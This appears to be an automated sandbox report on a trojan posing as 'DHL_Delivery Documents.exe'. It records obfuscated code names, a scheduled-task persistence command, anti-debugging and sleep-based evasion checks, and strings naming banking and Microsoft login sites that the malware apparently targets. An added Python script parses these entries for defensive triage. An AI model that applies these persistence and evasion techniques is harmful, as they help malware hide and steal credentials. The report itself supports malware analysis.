            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, Y5jh8ihuuv6mXkApNQ.csHigh entropy of concatenated method names: 'yna0jYDgZx', 'O020Z02YA0', 'DQ3014KMss', 'KMN0MffN61', 'VZy0vHZTEm', 'B6b0basyXQ', 'h970RLPmuL', 'PoZ0mgXW9c', 'hEB0TK8okK', 'cb70uc4GYN'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kxpixr3uPAMKj5Q2Cq.csHigh entropy of concatenated method names: 'HW2CXHchXA', 'unmCVpWX90', 'rMDG9PRnGw', 'HWWG6bhwcu', 'SxSCaPjjBf', 'bqdCor2ru2', 'xZZCDI5PA3', 'HF8Cyo0Gkh', 'oi5CkM3nAa', 'a0hCg4UtUa'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, n6ldLBu5fDp4pNHO3y.csHigh entropy of concatenated method names: 'ISY2vxQrCO', 'lVa2RJrTht', 'NSAN5YmlCe', 'fKtNrpTtf0', 'qRsNBFsMul', 'mRnNAP3Vse', 'OCpN7vctPk', 'rkXNn3S16O', 'X4oNhUAH7m', 'r0lNEpbXFf'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.csHigh entropy of concatenated method names: 'bMrSL4bdYS', 'SsnSQ8mBeR', 'L5NS8MwTtg', 'G1WSNn2jrX', 'YkQS2UbQ0v', 'j9eSW6wIAj', 'hpfS0rvfQ5', 'D3LSU6Bd0T', 'qkdSpxNbt5', 'zNUSOWm1DF'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, GEk4CQV1nkYogPRIP5.csHigh entropy of concatenated method names: 'BADP64JYIA', 'H9hPSQUFuR', 'jq9PlICkKx', 'FcBPQWcGO6', 'j5lP8WGPAD', 'I6kP295Ua0', 'uvpPW0TIWe', 'YYiGFfe1wx', 'bUFGX1gsnU', 'AsoGtPFfoi'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, hPpbPxy7qlsZaQYrUl.csHigh entropy of concatenated method names: 'NUOdEmsWwP', 'QZ7do70DJ5', 'wj3dyra6Ic', 'XrWdkLLiDc', 'agIdegtELY', 'woVd54n59C', 'VvhdrIWOM9', 'AwydBsO4OX', 'DcwdAA72pT', 'Krvd72teGR'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, kdd45aqdIHvmOw72Wh.csHigh entropy of concatenated method names: 'vwG1OW6mh', 'jNlMqG6pF', 'EeebXlKQC', 'FBPRDG6Iv', 'hIUTrO6rr', 'hhZuZnBcT', 'xa4LdIIC6IAOLLBeiR', 'N7A8077lpQmG4NLM8T', 'LvwGOeWnO', 'y9Vc8DToi'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RxkmdA69PTFuhRfPXeX.csHigh entropy of concatenated method names: 'advPjKSrex', 'rMjPZggM78', 'S44P1MHTsT', 'PHgPMxuFOG', 'gMuPvhfsml', 'PpvPbMTrbr', 'iPpPRsOkn5', 'aJcPmnS6fN', 'QGuPTVCRdG', 'aXEPuqKoqQ'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SFlTW26StfpklInMEh0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I0IcyJY6Ol', 'UYockUYD0t', 'mLqcgC0MOU', 'v9bcfr0uEg', 'TiDcJsOY82', 'cCrc3r9rd6', 'TPdcFcSJBA'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, jO3Tf3X7vkYNwGYAPE.csHigh entropy of concatenated method names: 'JAkGQku8Ku', 'ziQG8v403L', 'xIFGN8UfhC', 'oRTG2qlitJ', 'PCSGWWGWji', 'GNqG06W3Z5', 'wSyGUXfwEe', 'eQyGpA1q1o', 'iVZGOsKRtL', 'ABhGYtx0oH'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, yjA8AJ8FAEvC4Ibgo1.csHigh entropy of concatenated method names: 'Dispose', 'nS16ts6l5t', 'TT8qeruNSO', 'AcWOOMTBrN', 'Y0O6V3Tf37', 'AkY6zNwGYA', 'ProcessDialogKey', 'sEZq97GEca', 'jvLq6ObKcN', 'LxSqqwEk4C'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, XPVT9YwdK4GfnPIrg7.csHigh entropy of concatenated method names: 'hQAWL0kvSP', 'Sd3W8CUqC3', 'AgHW2kw0x0', 'j91W0EoWPk', 'sGSWU3yF1k', 'Wrj2Je1Ftb', 'eqP23FW5Iq', 'tAo2F34GXa', 'aF32XtoCmC', 'Ewu2trLGwg'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, z7GEcat0vLObKcNnxS.csHigh entropy of concatenated method names: 'DCeGwQMc53', 'cpRGeTu8Wm', 'SdPG5lvP1I', 'QOdGrNYvbY', 'r28GylScLZ', 'feiGBmaYKf', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.csHigh entropy of concatenated method names: 'ch88ysMWLB', 'TAf8kbr2EC', 'lJr8geZMUs', 'NjP8fPEvxf', 'ecS8JXBuDi', 'eRu830v3hJ', 'KOO8FquaWt', 'mgv8XG0Pqe', 'lC98tCWWRV', 'kP18VxtKk5'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AlPV4878XS9e8K3aHI.csHigh entropy of concatenated method names: 'Km90Q3RKa5', 'IwD0NYQhwE', 'isX0Wc5hG9', 'jcNWVEPMED', 'XuFWzk15Vj', 'QQi093tlPI', 'XMU06AoWnM', 'rF50qFXpSy', 'Pfl0SjbFuk', 'CA20lcbKcs'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, nCnGfHzpr4cbYfCxmv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Nx6PxtEyZU', 'a0OPdQN0Hq', 'Fj9PHm81if', 'Jy2PCsej4w', 'Ad0PGhjdTf', 'E5RPP2Sggj', 'i6ZPcrbrd5'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, A2h86JlramnZ7u93tE.csHigh entropy of concatenated method names: 'OyF603yVFh', 'N2W6U66Gxi', 'ipo6OKiyGm', 'YNY6Ymx6ld', 'gHO6d3ytPV', 'E9Y6HdK4Gf', 'v4Ru7jR2ePxAFprqWn', 'FdSQy9Tn1oP85Qapxr', 'nBC66U8qXp', 'm8J6SaRd08'
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe

            Boot Survival

            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\setx.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match - File source: Process Memory Space: YybGLWQSx.exe PID: 7204, type: MEMORYSTR
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 2BD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 2E30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 2C70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 6450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 7450000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 7590000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Memory allocated: 8590000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 760000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 2480000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 22B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 5A50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 6A50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 6B90000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Memory allocated: 7B90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Code function: 8_2_01C5096E rdtsc 8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8301
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1340
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8762
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 946
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - API coverage: 0.2 %
            Source: C:\Windows\SysWOW64\setx.exe - API coverage: 2.6 %
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe TID: 2568 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276 - Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768 - Thread sleep count: 8762 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 - Thread sleep count: 946 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 - Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe TID: 7236 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\setx.exe TID: 7972 - Thread sleep count: 47 > 30
            Source: C:\Windows\SysWOW64\setx.exe TID: 7972 - Thread sleep time: -94000s >= -30000s
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe TID: 8040 - Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exe - Code function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose, 18_2_0042BF20
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: rs.comVMware20,1
            Source: y11J94u5t.18.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: azure.comVMware20,116964286
            Source: y11J94u5t.18.dr - Binary or memory string: discord.comVMware20,11696428655f
            Source: y11J94u5t.18.dr - Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: global block list test formVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: y11J94u5t.18.dr - Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: date_createdINTEGERazure.comVMware20,116964286
            Source: y11J94u5t.18.dr - Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: y11J94u5t.18.dr - Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: y11J94u5t.18.dr - Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: y11J94u5t.18.dr - Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279541327.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2999530343.000001618DA8F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: y11J94u5t.18.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: y11J94u5t.18.dr - Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: y11J94u5t.18.dr - Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: AMC password management pageVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: y11J94u5t.18.dr - Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: y11J94u5t.18.dr - Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: y11J94u5t.18.dr - Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: y11J94u5t.18.dr - Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: y11J94u5t.18.dr - Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: setx.exe, 00000012.00000002.3278866707.000000000065E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(KIM
            Source: y11J94u5t.18.dr - Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: y11J94u5t.18.dr - Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe - Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\setx.exe - Process queried: DebugPort
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E rdtsc 8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004179A3 LdrLoadDll,8_2_004179A3
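The anti-analysis evidence in this part of the report (DebugPort queries, the rdtsc timing check, the LdrLoadDll call and the long run of fs:[30h] PEB reads that follows) is easier to triage once it is grouped per function. The script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses evidence lines in the flattened text form they take on this page (it also accepts a " | " separator between source and label), classifies each as a PEB read, timing check, loader-API call or debug-port query, and counts hits per function so that functions with repeated PEB reads stand out as the likely anti-debug routines. The sample lines are copied from this report; the category names and the hotspot threshold are the example's own choices.

```python
import re
from collections import Counter, defaultdict
from typing import Optional, Tuple

# Constructed sample: evidence lines copied from this Joe Sandbox report in the flattened
# form the page extraction produced (column separators lost, "Jump to behavior" link text
# fused to the line end, and the function id repeated after the instruction).
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\setx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E rdtsc 8_2_01C5096E
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004179A3 LdrLoadDll,8_2_004179A3
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov ecx, dword ptr fs:[00000030h]8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE61E5 mov eax, dword ptr fs:[00000030h]8_2_01CE61E5
Source: y11J94u5t.18.drBinary or memory string: bankofamerica.comVMware20,11696428655x
"""

# "Code function:" rows. The separator between source path and label may be missing
# (flattened text) or rendered as " | ". The function id has the form pid_run_addr.
CODE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<rest>.*)$"
)
# "Process queried:" rows (NtQueryInformationProcess-style checks such as ProcessDebugPort).
QUERY_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Process queried:\s*(?P<what>.+?)\s*(?:Jump to behavior)?\s*$"
)


def classify(insn: str) -> Optional[str]:
    """Map a disassembly fragment to the anti-analysis technique it evidences."""
    low = insn.lower()
    if "fs:[00000030h]" in low:
        # TEB+0x30 holds the PEB pointer on 32-bit Windows; from the PEB the code can read
        # BeingDebugged (PEB+0x02) or NtGlobalFlag (PEB+0x68) without any API call.
        return "peb_read"
    if low.startswith("rdtsc"):
        # Cycle-counter deltas expose single-stepping and breakpoints.
        return "timing"
    if "ldrloaddll" in low or "ldrgetprocedureaddress" in low:
        # Direct ntdll loader calls sidestep hooks on kernel32 LoadLibrary/GetProcAddress.
        return "loader_api"
    return None


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (kind, key, detail) for a recognised evidence line, else None."""
    line = line.strip()
    m = CODE_RE.match(line)
    if m:
        fn, rest = m.group("fn"), m.group("rest").strip()
        if rest.endswith(fn):          # drop the function id repeated by the link column
            rest = rest[: -len(fn)]
        insn = rest.strip().rstrip(",").strip()
        kind = classify(insn)
        return (kind, fn, insn) if kind else None
    m = QUERY_RE.match(line)
    if m and m.group("what").strip() == "DebugPort":
        return ("debugport_query", m.group("src").strip(), "ProcessDebugPort")
    return None


def summarize(text: str) -> dict:
    """Count evidence hits per technique, keyed by function id (or process for queries)."""
    summary = defaultdict(Counter)
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed:
            kind, key, _ = parsed
            summary[kind][key] += 1
    return {kind: dict(counts) for kind, counts in summary.items()}


def peb_hotspots(summary: dict, min_reads: int = 2):
    """Functions with at least min_reads PEB accesses, most first: likely anti-debug checks."""
    counts = summary.get("peb_read", {})
    return sorted(((fn, n) for fn, n in counts.items() if n >= min_reads),
                  key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for kind, counts in sorted(result.items()):
        print(f"{kind}: {sum(counts.values())} hit(s) across {len(counts)} source(s)")
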